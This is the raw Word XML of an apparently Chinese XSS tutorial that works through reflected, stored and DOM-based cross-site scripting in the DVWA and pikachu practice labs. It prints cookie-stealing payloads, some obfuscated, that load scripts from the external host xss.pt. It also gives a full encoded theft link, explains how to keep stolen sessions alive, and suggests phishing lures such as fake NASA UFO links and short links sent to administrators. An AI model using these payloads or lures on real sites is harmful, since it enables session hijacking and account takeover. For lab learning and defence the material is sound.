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75" w:beforeAutospacing="0" w:after="375" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="PingFang SC" w:hAnsi="PingFang SC" w:eastAsia="宋体" w:cs="PingFang SC"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84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PingFang SC" w:hAnsi="PingFang SC" w:cs="PingFang SC"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="PingFang SC" w:hAnsi="PingFang SC" w:cs="PingFang SC"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ss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75" w:beforeAutospacing="0" w:after="375" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts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  <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>0.介绍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跨站攻击，即Cross Site Script Execution(通常简写为XSS)，是前端的漏洞，产生在浏览器一端的漏洞。它是指攻击者在网页中嵌入客户端脚本，主要利用js编写的恶意代码来执行一些想要的功能，也就是说它能干嘛是受到js的控制，那么js能执行出什么脚本代码就取决于它能干嘛。当用户使用浏览器浏览被嵌入恶意代码的网页时，恶意代码将会在用户的浏览器上执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39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  <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>0.1.能干嘛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常规用到的是盗取cookie、js做钓鱼攻击、流量指向等。主要是盗取管理员的会话和cookie信息，就是我们常说的管理员凭证，就意味着得到后台权限，可以直接利用。还能配合别的漏洞，比如可以和网页木马结合，扔到那里去跳转到网马地址，网马地址被执行后续就控制一些权限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75" w:beforeAutospacing="0" w:after="375" w:afterAutospacing="0" w:line="33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  <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>1.原理分析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输出问题导致的js代码被识别执行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&lt;?php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 xml:space="preserve">   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ab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$xss=$_GET['x'];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ab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echo $xss;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//127.0.0.1/test/xss.php?x=&lt;script&gt;alert(1)&lt;/script&gt;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//js代码;&lt;script&gt;alert(1)&lt;/script&gt; 调用执行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//漏洞产生原理：输出问题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?&gt;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75" w:beforeAutospacing="0" w:after="375" w:afterAutospacing="0" w:line="33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  <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>2.发现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由于漏洞产生在前端，那么发现的话，主要是看浏览器的执行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人为手工测试，测试显示地方是否能够自定义。一般出现在数据交互的地方（留言板，数据插入地方），比如网上的营销页面，购买商品需要自己选择，填写收货地址，电话等，这里可以把跨站语句插入进去，如果没有过滤，极有可能导致跨站漏洞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工具扫描测试（awvs，appscan）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75" w:beforeAutospacing="0" w:after="375" w:afterAutospacing="0" w:line="33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  <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>3.分类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39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  <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>3.1.反射型XSS（非持续型XSS）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是一种非持续型攻击。漏洞本身存在，但是需要攻击者构造出来，然后让对方去触发。它不会对正常的访问造成跨站攻击。这种攻击是一次型攻击，它不会写入到数据库里。当用户访问一个带有XSS代码的URL请求时，服务器端接收数据后处理，然后把带有XSS的数据发送到浏览器，浏览器解析这段带有XSS代码的数据后，最终造成XSS漏洞。这个过程就像一次反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出现地方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交互的数据一般不会被存在数据库里面，一次性，所见即所得，一般出现在查询类页面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3.1.1.注意事项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我们可通过发送构造的链接，来进行利用：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需要一个网站，网站中有个能够收集cookie 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需要有收集受害者cookie后将收集的cookie发送给网站中文件的js文件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构造链接，当用户点击该链接时，相当于执行了获取该用户的cookie并把cookie发送给收集cookie文件的操作。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例1：如果是NASA网站的跨站，大家完全可以在一些天文爱好者聚集的群里发类似这样的消息，如：“美国航空航天局公布最新UFO照片”然后加上我们的链接。由于是NASA的链接(现在连小学生都知道NASA是干什么的)，我想应该会有一部分人相信而去点击从而达到了我们的目的，这个反射型的XSS被触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例2：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（1）用户z是网站www.xxx.org的粉丝，此时正在论坛看信息。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（2）攻击者发现www.xxx.org/xss.php存在反射型漏洞，然后精心构造JavaScript代码，此段代码可以盗取用户cookie发送到指定的站点www.xxser.com。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（3）攻击者将带有反射型XSS漏洞的URL通过站内信发送给用户z，站内信为一些诱惑信息，目的是为了让用户z单击链接。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（4）假设用户z单击了带有XSS漏洞的URL，那么将会把自己的cookie发送到网站www.xxser.com。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（5）攻击者将接收到用户z的会话cookie，可以直接利用cookie以z的身份登录www.xxx.org，从而获取用户z的敏感信息 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3.1.2.过程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参考：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instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/weixin_50464560/article/details/114782337"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t>通过DVWA学习XSS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反射型XSS从简入难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3.1.2.1.判断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比如如下网站：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590925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="3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我们在账户输入处输入whoami，查看源代码，按下ctrl+f来搜索：whoami，看出现在哪个位置，来构造特定的payload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505200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15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我们可以构造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"&gt; &lt;script&gt;alert('XSS')&lt;/script&gt;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把前面的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&lt;input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闭合掉，让它执行后面的代码，构造好代码后把URL变成短链接发送给管理员，管理员点击打开获取他的cookie登录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038475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="9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挖掘反射型xss的方法就是这些，手工也是这个方法，只是需要自己去找存在xss漏洞的网站，手工就一句话：见框就插，改数据包中的参数，改URL中的参数，js源代码分析。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改数据包，js源代码分析比较深就不再细说了，见框就插就比较好理解了，先在输入框输入唯一的字符串，查看源代码字符串的位置，在输入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&lt;&gt;""/&amp;()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的时候看过滤了什么，根据过滤的字符来构造特定的xss代码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3.1.2.1.使用工具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注意：这里网上有许多搭建的XSS Platform，如果一个不能用可以换别的用，不一定要用我给的这个，甚至可以自己搭建一个XSS Platform。不过下面的过程是我基于这个网站使用的，都大同小异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1.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先使用XSS Platform：https://xss.pt/，点击“创建项目”。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1295400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23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打勾“默认模块”，该模块是获取cookie值的。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720" w:right="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="333333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8F8F8"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>无keepsession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720" w:right="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="333333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8F8F8"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>keepsession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无keepsession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的区别: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的意思是保持连接，也就是当获取到目标网站的cookie后，保持这个cookie，因为网站cookie可能是有时效的，比如时效为10分钟，那么当接收到这cookie后，没有及时查看，cookie过期失效了，那么这个cookie就没有用处了。当选择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后，没有及时查看，cookie过期失效了，那么这个cookie就没有用处了。当选择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后，XSS Platform将会一直在后台刷新cookie，也就是保持这个cookie的有效性，反之，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无keepsession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就是不保持连接。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那么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到底是怎么样实现的呢？看了下代码发现很简单，平台会自动的隔一段时间，遍历整个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keepsession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表里面的数据。随后循环对目标服务器进行一次带cookie的请求。这样就实现了维持会话的功能了。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下面的其他模块，各自代表着xss的其他种攻击，具体可在“配置代码”这步选完进去后，在左边的“公共模块”里点击，查看模块信息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4429125" cy="6172200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="24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以下为部分截图，只要将其中一种代码插入怀疑出现XSS的地方，发给别人，如果有人点击该地址，我们就可在"项目内容"中查看其cookie值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4752975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6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其中的代码看情况来用。下面写出我比较常用，直接插入构造，访问后cookie可返回到“项目内容”的代码。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图片插件一：  https://xss.pt/GFLXp.jpg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&lt;Img sRC=https://xss.pt/GFLXp.jpg&gt;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一、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1.&lt;sCRiPt sRC=//xss.pt/GFLX&gt;&lt;/sCrIpT&gt;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2.标准代码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&lt;/tExtArEa&gt;'"&gt;&lt;sCRiPt sRC=https://xss.pt/GFLX&gt;&lt;/sCrIpT&gt;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二、IMG 标签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1.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&lt;/tEXtArEa&gt;'"&gt;&lt;img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22https%3A%2F%2Fxss.pt%2FGFLX%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//&gt;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2.&lt;img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xss.pt/GFLX';&gt;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3.通杀火狐谷歌360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&lt;img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovL3hzcy5wdC9wNzBlPycrTWF0aC5yYW5kb20oKQ=='))&gt;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三、标签iframe等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1.实体10进制编码↓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&lt;iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。&lt;sCRiPt sRC="https://xss.pt/GFLX"&gt;&lt;/sCrIpT&gt;&gt;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2.实体16进制编码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&lt;iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。&lt;sCRiPt sRC="https://xss.pt/GFLX"&gt;&lt;/sCrIpT&gt;&gt;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这里我用到dvwa靶场的medium级别。为了更好的验证，我使用了username为1337的用户进行登录。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这里我先构造js代码测试出这里存在反射型xss漏洞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4543425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="25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然后构造链接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http://192.168.1.3/dvwa/vulnerabilities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/xss_r/?name=%3Ciframe WIDTH%3D0HEIGHT%3D0 srcdoc%3D%E3%80%82%E3%80%82%E3%80%82%E3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%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82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%E3%80%82%E3%80%82%26%23x3C%3B%26%23x73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%3B%26%23x43%3B%26%23x52%3B%26%23x69%3B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%26%23x50%3B%26%23x74%3B%26%23x20%3B%26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%23x73%3B%26%23x52%3B%26%23x43%3B%26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%23x3D%3B%26%23x22%3B%26%23x68%3B%26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%23x74%3B%26%23x74%3B%26%23x70%3B%26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%23x73%3B%26%23x3A%3B%26%23x2F%3B%26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%23x2F%3B%26%23x78%3B%26%23x73%3B%26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%23x73%3B%26%23x2E%3B%26%23x70%3B%26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%23x74%3B%26%23x2F%3B%26%23x47%3B%26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%23x46%3B%26%23x4C%3B%26%23x58%3B%26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%23x22%3B%26%23x3E%3B%26%23x3C%3B%26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%23x2F%3B%26%23x73%3B%26%23x43%3B%26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%23x72%3B%26%23x49%3B%26%23x70%3B%26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%23x54%3B%26%23x3E%3B%3E#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然后再用admin账户登录，级别为low。复制构造好的网址并访问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162300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14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914775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="20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然后就盗取到该cookie了，看到cookie值security=low，正好是我们设置的low级别，得知盗取admin账户的cookie成功了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5857875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="17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最后按F12，点击Application这一栏，将其中的cookie修改为我盗取到的admin的cookie，再刷新界面，可以看到我们变成了admin的账户，级别也变为low了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2638425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="12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2447925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16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3.1.2.2.注意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刚开始我不是用火狐的低版本浏览器来验证，而是用Microsoft Edge 88.0.705.74的高版本浏览器来验证，一直失败，最后用火狐就成功了。我觉得这里应该是涉及到了浏览器的安全策略问题，所以尽量使用低版本的浏览器来做XSS漏洞，高版本会过滤js本地的一些脚本的加载使攻击失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3.1.3.特别操作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3.1.3.1.XSS之href输出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在a标签的href属性里面,可以使用javascript协议来执行js，可以尝试使用伪协议绕过。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javascript:alert(/xss/)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点击即可触发弹窗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这里是自己写的一个a标签的href属性：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&lt;a href=javascript:alert(/xss/)&gt;xss&lt;/a&gt;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114675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="18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如果你在输入框中输入的代码直接出现在a标签的href属性里面，那就直接写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javascript:alert(/xss/)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467100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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3.1.3.2.XSS之盲打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XSS盲打是一种攻击场景。我们输出的payload不会在前端进行输出，当管理员查看时就会遭到XSS攻击。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输入常规的payload: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&lt;script&gt;alert(1)&lt;/script&gt;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,点击提交后发现这里提示一段文字，应该是直接传到后台了，找到后台，登录进去看看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552825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="19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后台地址是/xssblind/admin_login.php。pikachu有三个初始用户，我这里的是用户名admin，密码123456，登录即可触发XSS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1790700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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还有一点，如果碰上了XSS中目标不让信息显示出来，如果能发送请求，那么就可以尝试咱这个办法——用DNSlog来获取回显。简单来说，在xss上的利用是在于我们将xss的攻击代码拼接到dnslog网址的高级域名上，就可以在用户访问的时候，将他的信息带回来。具体可以看我的另外一篇笔记，是关于DNSlog来使本来不会显示的信息回显的，比如SQL盲注就可以利用此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3.1.3.3.XSS之过滤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具体可看这个：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instrText xml:space="preserve"> HYPERLINK "https://www.freebuf.com/articles/web/276998.html" \l "2"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t>XSS过滤绕过速查表(按ctrl键点我跳转)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输入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'&lt;script&gt;alert(1)&lt;/script&gt;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，看输出结果和前端源码，被过滤得只剩下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'&gt;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了，输入与输出结果不一致。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657600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11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这里看一波源码，发现这里会使用正则对&lt;script进行替换为空,也就是过滤掉，但是只是对小写进行了替换。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1819275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="21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那我们就尝试用大写绕过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payload：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&lt;Script&gt;alert(1)&lt;/sCript&gt;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067425" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="13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因为这里只是过滤了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script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，所以其实还有许多payload可以尝试，比如：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&lt;img src=a onclick="alert(1)"&gt;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点击图片触发弹窗、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&lt;img src=a onmouseover="alert(1)"&gt;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鼠标移动到图片的位置触发弹窗、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&lt;img src=a onerror="alert(1)"&gt;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图像加载过程中发生错误时触发弹窗。还有下面这种：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&lt;iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=&gt;&lt;/iframe&gt;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//iframe元素会创建包含另外一个文档的内联框架（即行内框架）。我将&lt;script&gt;alert(/xss/)&lt;/script&gt;用base64编码然后放在iframe元素里，这里也可以绕过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39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  <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>3.2.存储型XSS（持续型XSS）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是一种持续型的攻击。将跨站代码植入到网站的数据库中。一旦攻击者第一次成功攻击之后，那么在后续的其他访问者均会受到跨站攻击。这种攻击可能是写到网站的留言板，那么当对方访问留言板就会被触发。它与反射型、DOM型XSS相比，具有更高的隐蔽性，危害性也更大。它们之间最大区别在于反射型与DOM型XSS执行都必须依靠用户手动触发，而存储型XSS却不需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出现地方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交互的数据会被存在数据库里面，永久性存储，一般出现在留言板、注册等页面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3.2.1.过程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3.2.1.1.判断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存储型xss和反射型不同的地方在于他会把输入的数据保存在服务端，反射型输入的数据游走在客户端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存储型xss主要存在于留言板评论区，因为最近没有挖到存储型xss，所以这里就用dvwa的留言板用来演示：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点击留言**(这里最好不要使用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&lt;script&gt;alert("xss")&lt;/script&gt;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来测试是否存在XSS漏洞，容易被管理员发现，所以你可以使用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&lt;a&gt;&lt;/a&gt;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来测试，如果成功了，不会被管理员发现)**OK，我先在留言里输入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&lt;a&gt;s&lt;/a&gt;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提交留言，F12打开审查元素，来看我们输入的标签是否被过滤了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1504950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22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发现没有过滤 (如果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&lt;a&gt;s&lt;/a&gt;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中的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&lt;a&gt;&lt;/a&gt;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是彩色的说明没有过滤，如果是灰色就说明过滤了)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4486275" cy="1390650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="7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这里换成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impossible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级别就是灰色的，说明被过滤了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3648075" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="8" name="图片 22" descr="IMG_27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 descr="IMG_2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这里留言板中只留下s，并且s是这样显示的，也说明这里没有过滤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4524375" cy="790575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="10" name="图片 23" descr="IMG_278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 descr="IMG_2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这里换成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impossible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级别就留下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&lt;a&gt;s&lt;/a&gt;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，说明被过滤了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4400550" cy="619125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="30" name="图片 24" descr="IMG_279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7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3.1.2.2.使用工具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和反射型XSS的利用方法大同小异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instrText xml:space="preserve"> HYPERLINK "https://www.freebuf.com/articles/web/276998.html" \l "1"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t>反射型XSS(按ctrl键点我跳转)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3.1.2.3.优势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我在留言板中写下如下留言：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2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="图片 25" descr="IMG_280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8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3086100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="图片 26" descr="IMG_281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只要管理员点击那个留言板中已经成功写入获取cookie代码的网页，我们就可以获取到管理员的cookie和后台地址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比如这里我一在dvwa的留言板中刷新，XSS Platform中就会有我的cookie和这个dvwa的地址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838200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="图片 27" descr="IMG_282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39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  <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>3.3.DOM型XSS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instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/mysticbinary/p/12542695.html"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t>DOM-XSS攻击原理与防御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instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/Bul1et/article/details/85091020"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t>DOM型xss深度剖析与利用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DOM的全称为Document Object Model，即文档对象模型，DOM通常用于代表在HTML、XHTML和XML中的对象。使用DOM可以允许程序和脚本动态地访问和更新文档的内容、结构和样式。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通过js可以重构整个HTML页面，而要重构页面或者页面中的某个对象，js就需要知道HTML文档中所有元素的“位置”。而DOM为文档提供了结构化表示，并定义了如何通过脚本来访问文档结构。根据DOM规定，HTML文档中的每个成分都是一个节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DOM的规定如下：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整个文档是一个文档节点；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每个HTML标签是一个元素节点；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包含在HTML元素中的文本是文本节点；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每一个HTML属性是一个属性节点；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节点与节点之间都有等级关系。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HTML的标签都是一个个的节点，而这些节点组成了DOM的整体结构：节点树。如图所示：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4629150" cy="2533650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="图片 28" descr="IMG_283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8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简单来说，DOM为一个一个访问html的标准编程接口。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可以发现DOM本身就代表文档的意思，而基于DOM型的XSS是不需要与服务器端交互的，它只发生在客户端处理数据阶段，是基于javascript的。而上面两种XSS都需要服务端的反馈来构造xss。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DOM型XSS示例：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&lt;script&gt; var temp = document.URL; //获取URL var index = document.URL.indexOf("content=")+4; var par = temp.substring(index); document.write(decodeURI(par)); //输入获取内容 &lt;/script&gt;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上述代码的意思是获取URL中content参数的值，并且输出，如果输入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网址?content=&lt;script&gt;alert(/xss/)&lt;/script&gt;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,就会产生XSS漏洞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这里再举一例：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这个文件名为123.html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5" w:beforeAutospacing="0" w:after="225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2"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pP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595959"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>&lt;script&gt; document.write(document.URL.substring(document.URL.indexOf("a=")+2,document.URL.length)); &lt;/script&gt;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在这里我先解释下上面的意思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Document.write是把里面的内容写到页面里。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document.URL是获取URL地址。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substring 从某处到某处，把之间的内容获取。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document.URL.indexOf("a=")+2是在当前URL里从开头检索a=字符，然后加2(因为a=是两个字符，我们需要把他略去)，同时他也是substring的开始值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document.URL.length是获取当前URL的长度，同时也是substring的结束值。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合起来的意思就是：在URL获取a=后面的值，然后把a=后面的值给显示出来。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5667375" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1" name="图片 29" descr="IMG_284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9" descr="IMG_28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怎么会出现这个问题呢？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因为当前url并没有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a=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的字符，而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indexOf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的特性是，当获取的值里，如果没有找到自己要检索的值的话，返回-1。找到了则返回0。那么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document.URL.indexOf("a=")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则为-1，再加上2，得1。然后一直到URL最后。这样一来，就把file的f字符给略去了，所以才会出现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ttp://127.0.0.1/123.html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大致的原理都会了，我们继续下面的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我们可以在123.html后面加上?a=123或者#a=123，只要不影响前面的路径，而且保证a=出现在URL就可以了。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5895975" cy="1323975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="2" name="图片 30" descr="IMG_285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0" descr="IMG_28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我们清楚的看到我们输入的字符被显示出来了。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那我们输入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&lt;script&gt;alert(1)&lt;/script&gt;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会怎么样呢？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答案肯定是弹窗(这个用的是360安全浏览器)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371725" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="3" name="图片 31" descr="IMG_286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1" descr="IMG_28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但是这下面没却没有弹窗，这是为什么呢？这是因为浏览器不同，maxthon、firefox、chrome则不行，他们会在你提交数据之前，对url进行编码。这不是说DOM型XSS不行了，这只是个很简单的例子，所以不用在意。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1695450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38" name="图片 32" descr="IMG_287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 descr="IMG_28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我再次强调下，DOM型XSS 是基于javascript基础上，而且不与服务端进行交互，他的code对你是可见的，而基于服务端的反射型、存储型则是不可见的。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3.3.1.利用原理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客户端JS可以访问浏览器的DOM文本对象模型是利用的前提，当确认客户端代码中有DOM型XSS漏洞时，并且能诱使(钓鱼)一名用户访问自己构造的URL，就说明可以在受害者的客户端注入恶意脚本。利用步骤和反射型很类似，但是唯一的区别就是，构造的URL参数不用发送到服务器端，可以达到绕过WAF、躲避服务端的检测效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3.3.2.过程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输入测试代码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'"&lt;&gt;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，显示的内容和我们所输入的有所不同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5019675" cy="5200650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="36" name="图片 33" descr="IMG_288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 descr="IMG_28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那就来看看源码吧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6572250" cy="1819275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="34" name="图片 34" descr="IMG_289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HTML的DOM中，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getElementById()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方法可返回对拥有指定 ID 的第一个对象的引用。语法为：document.getElementById(id)。在这里就是获取标签id为text的值传递给str，str通过字符串拼接到a标签中。所以我们要闭合前面的标签输入payload：'&gt;&lt;img src=a onmouseover="alert(1)"&gt;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成功闭合，鼠标移动到图片的位置触发弹窗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774C9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5114925" cy="5372100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="37" name="图片 35" descr="IMG_290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9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75" w:beforeAutospacing="0" w:after="375" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline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  <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>4.注意事项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90" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline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1.能不能执行js代码主要看浏览器的安全策略怎么样，要考虑到各个浏览器的版本的安全策略，浏览器版本比较高的时候，有些js代码会被禁用。像IE高版本会过滤js本地的一些脚本的加载，所以存在这个攻击也会攻击失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u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>2.需要受害者去配合。一般需要特定的人去访问去触发才行。是被动攻击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5ZjIwNTg3MDliNGM0OThiZjBhN2RhNDNlMDhhNGIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="0E5628AE"/>
    <w:rsid w:val="75FF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image.3001.net/images/20210602/1622624332_60b7484c7436b9c83d0dc.jpg!small" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpeg"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624357_60b7486541c0c0d3889ea.jpg!small" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624356_60b74864aeb6eb1d63c16.jpg!small" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpeg"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624354_60b748621fdeb049cf070.jpg!small" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpeg"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624353_60b74861849e6ff289bc6.jpg!small" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpeg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624353_60b748610f1687e8cc779.jpg!small" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624352_60b7486090d229c8c1223.jpg!small" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624352_60b748602202040491a40.jpg!small" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624327_60b74847827b308f2690d.jpg!small" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624351_60b7485f98c53cbc653a9.jpg!small" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624351_60b7485f1b4848ce57687.jpg!small" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624350_60b7485e88a16856693d3.jpg!small" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624349_60b7485deed06298129ea.jpg!small" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 